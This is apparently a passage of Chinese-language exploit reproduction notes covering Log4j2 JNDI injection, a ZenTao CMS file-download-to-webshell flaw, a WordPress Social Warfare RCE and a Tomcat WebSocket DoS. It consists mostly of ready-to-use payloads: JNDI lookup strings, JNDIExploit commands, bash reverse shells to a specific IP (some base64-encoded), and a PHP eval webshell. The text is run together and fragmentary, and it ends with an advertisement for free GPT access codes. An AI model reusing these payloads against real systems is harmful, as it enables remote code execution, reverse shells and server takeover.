(args.file) as f:for i in f.readlines():i = i.strip()Exploit(i)if __name__ == '__main__':main()

---

L4 ？？？

java 版本问题？？？？？？？！！！！！！！！！！！！！！！ vps自身防御问题。

log4j2-rce-cve-2021-44228 漏洞复现_log4j2 复现 vps 开放端口-CSDN博客

i6bfpg.dnslog.cn/solr/admin/cores?action=${jndi:ldap://rcilyy.dnslog.cn}
${jndi:ldap://${sys:java.version}.rcilyy.dnslog.cn}http://domain/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.u8gtb8.dnslog.cn}${jndi:ldap://x❌x❌1389/Basic/Command/Base64/base64命令}
${jndi:ldap://39.105.154.133:1389/Basic/Command/Base64/bHM=}poc：ldap://null:1389/Basic/ReverseShell/[ip]/[port] ---windows NOT supporte实际构造：${jndi:ldap://39.105.154.133:1389/Basic/ReverseShell/39.105.154.133/9090}
——————————
java -jar JNDIExploit-2.0-SNAPSHOT.jar -i 39.105.154.133${jndi:ldap://39.105.154.133:1389/Basic/ReverseShell/39.105.154.133/9090}bash -i >& /dev/tcp/39.105.154.133/9999 0>&1java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8zOS4xMDUuMTU0LjEzMy85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}" -A "39.105.154.133"rmi://39.105.154.133:1099/qxavqn${jndi:rmi://39.105.154.133:1099/2kzlcs}

---

禅道CMS

禅道项目管理软件是国产的开源项目管理软件。 账户密码为admin:123456

禅道CMS文件上传漏洞（CNVD-C-2020-121325）

准备工作 
1、在自己的服务器上创建shell.php 
内容为<?php phpinfo();?> 
2、将shell.php 放到web 服务器可以访问的目录3、对恶意文件地址进行base64编码利用poc远程下载文件 
http://靶场 ip/zentao/client-download-1
aHR0cDovL3h4eC54eHgueHh4Lnh4eC9zaGVsbC5waHA=-1.html 
访问shell 
http://靶场 ip/zentao/data/client/1/shell.php

ok，拿下。

---

禅道12.4.2后台管理员权限Getshell - FreeBuf网络安全行业门户

青岛易软天创网络科技有限公司禅道cms存在命令执行漏洞（CNVD-2020-45147）

12.3.2

【CNVD/CVE】CNVD-C-2020-121325-CSDN博客

aHR0cDovLzM5LjEwNS4xNTQuMTMzOjkwOTAvc2hlbGwucGhwzentao/client-download-1-aHR0cDovLzM5LjEwNS4xNTQuMTMzOjkwOTAvc2hlbGwucGhw-1.htmlzentao/data/client/1/shell.php<?php echo "<?php phpinfo();?>";
<?php echo "<?php @eval($_POST[2]);?>";SFRUUDovLzM5LjEwNS4xNTQuMTMzOjkwOTAvc2hlbGwucGhw
http://101.36.125.125:20092/zenteo/www/client-download-1-SFRUUDovLzM5LjEwNS4xNTQuMTMzOjkwOTAvc2hlbGwucGhw.html

---

cve-2019-9978

CVE-2919-9978 wordpress social warfare插件RCE | St1_Fn

登录---开启插件---构造利用

http://39.105.154.133:9090/test.txthttp://your-targetIP/wp-admin/admin.php?page=social-warfare&swp_debug=load_options&swp_url=http://you-attack-ip/test.txt
http://101.36.125.125:37769/wp-admin/admin.php?page=social-warfare&swp_debug=load_options&swp_url=http://39.105.154.133:9090/test.txt

---

猫咪&cve-2020-13935 （题重）

测试POC 
https://github.com/RedTeamPentesting/CVE-2020-139351. $ git clone https://github.com/RedTeamPentesting/CVE-2020-13935 
2. $ cd CVE-2020-13935 
3.go env -w GOPROXY=https://goproxy.cn 
4. $ go build 
5. $ ./tcdos ws://靶场ip/examples/websocket/echoStreamAnnotation

---

广x

打个广xxx ：gpt教程：https://gitee.com/jinhu1/chatgpt-share

       加v：kiko_wp  ，发你永久免费的GPT授权码。

---